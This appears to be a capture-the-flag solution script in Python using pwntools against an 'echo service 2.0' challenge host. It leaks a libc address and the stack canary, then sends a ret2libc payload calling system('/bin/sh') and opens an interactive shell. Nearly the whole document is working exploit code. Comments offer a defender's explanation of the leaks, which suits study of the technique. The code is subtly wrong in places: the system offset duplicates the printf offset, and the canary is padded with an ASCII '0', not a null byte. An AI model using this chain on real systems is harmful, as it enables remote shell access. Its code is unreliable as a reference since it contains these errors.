# Solution script for the "echo service 2.0" challenge on vuln.redrocket.club:6660.
#
# Flow, as written below: read the libc pointer the service prints on its
# second line, derive a libc base and gadget addresses from hard-coded offsets,
# send 41 bytes so that the echoed reply exposes bytes of the stack canary,
# then send a single ret2libc chain (pop rdi; "/bin/sh"; system).
#
# Defender's reading: ASLR and the stack canary are not defeated by the
# mitigations being weak but by two information leaks in the service itself —
# it prints a libc address, and its echo apparently returns bytes beyond what
# was sent (see the canary slice below).  Closing those leaks is what fixes
# the service; the offsets used here are specific to one libc build and a
# fixed stack layout.
from colorama import Fore, Back, Style   # not used anywhere in this script

from pwn import *
import sys   # not used anywhere in this script


io = remote('vuln.redrocket.club', 6660)

# b'Welcome to the echo service 2.0!\n'
print(io.recvline())

#b'printf is at 0x....\n'
# [13:-1] drops the 13-character prefix "printf is at " and the trailing newline,
# leaving the hex digits that int(..., 16) parses.
printf_address = int(io.recvline()[13:-1],16)
print("printf is at "+str(p64(printf_address).hex()))


### Calculate Gadget adresses ###
# Offsets relative to the libc base; they are tied to one specific libc build
# (not shown here) and are the first thing to re-check if this stops working.
printf_offset  = 0x4f440
system_offset  = 0x04f440
bin_sh_offset  = 0x1b3e9a
pop_rdi_offset = 0x2155f

# Base = leaked address minus the symbol's offset; everything else is base + offset.
libc_base_address = printf_address - printf_offset
print("libc_base_address is at "+str(p64(libc_base_address).hex()))
system_address = libc_base_address + system_offset
print("system is at "+str(p64(system_address).hex()))
bin_sh_address = libc_base_address + bin_sh_offset
print("bin_sh is at "+str(p64(bin_sh_address).hex()))
pop_rdi_address = libc_base_address + pop_rdi_offset
print("pop_rdi is at "+str(p64(pop_rdi_address).hex()))



### Leak Stack Canary ###
# 41 bytes: one more than the 40 bytes of padding used in the final payload.
overflowing_bytes = b"x"*41
print("sending: "+overflowing_bytes.hex())
io.send(overflowing_bytes)
line = io.recvline()
# The reply is sliced past the 41 sent bytes, so the service presumably echoes
# stack contents beyond the input; 7 bytes are taken and one byte is prepended
# to form an 8-byte canary value.
stack_canary = b"0"+line[41:48]
print("stack_canary: "+str(stack_canary.hex()))



### Prepare Payload ###
tosend = b""

# a) padding up to the stack canary
tosend += b"x"*40

# b) stack canary (must match, or the canary check aborts the process)
tosend += stack_canary

# c) padding up to the saved return address
tosend += b"x"*8

# d) return address -> gadget "pop rdi ; ret"
tosend += p64(pop_rdi_address)

# e) value popped into rdi: pointer to the string "/bin/sh"
tosend += p64(bin_sh_address)

# f) next return address -> system()
tosend += p64(system_address)

tosend += b"\n"

### Perform Exploit ###
print("sending: "+tosend.hex())
io.send(tosend)
print("answer: "+str(io.recvline()))
io.interactive()
io.close()